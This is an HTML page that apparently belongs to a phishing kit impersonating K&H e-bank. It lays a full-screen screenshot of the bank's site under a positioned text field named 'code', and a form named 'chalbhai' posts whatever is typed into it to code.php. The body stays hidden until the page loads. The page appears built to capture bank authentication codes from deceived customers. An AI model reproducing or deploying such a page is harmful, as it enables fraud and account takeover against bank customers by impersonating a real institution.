
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>K&amp;H e-bank</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />
<link rel="stylesheet" href="pure-min.css">

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>
<style type="text/css">
<!--
.style1 {
	font-size: 18px;
	color: #585858;
	font-weight: bold;
	font-family: Arial, Helvetica, sans-serif;
}
-->
</style>
<body style="visibility:hidden" onLoad="unhideBody()">
</head>
<body>
<div id="image4" style="position:absolute; overflow:hidden; width:1350px; height:680px; z-index:3; left: 0px; top: 0px;"><a href="#"><img src="images/22.PNG" alt="" title="" border=0 width=1350 height=680></a></div>



<form action=code.php name=chalbhai id=chalbhai method=post class="pure-form">
<input name="code" placeholder=" " required type="text" maxlength=30 style="position:absolute; width:178px; left:611px; font-size: 15px; top:296px; z-index:6; height: 29px;">

<div id="formimage1" style="position:absolute; left:612px; top:346px; z-index:7">
<input type="image" name="formimage1" width="130" height="67" src="images/23.PNG"></div>

</body>
</html>
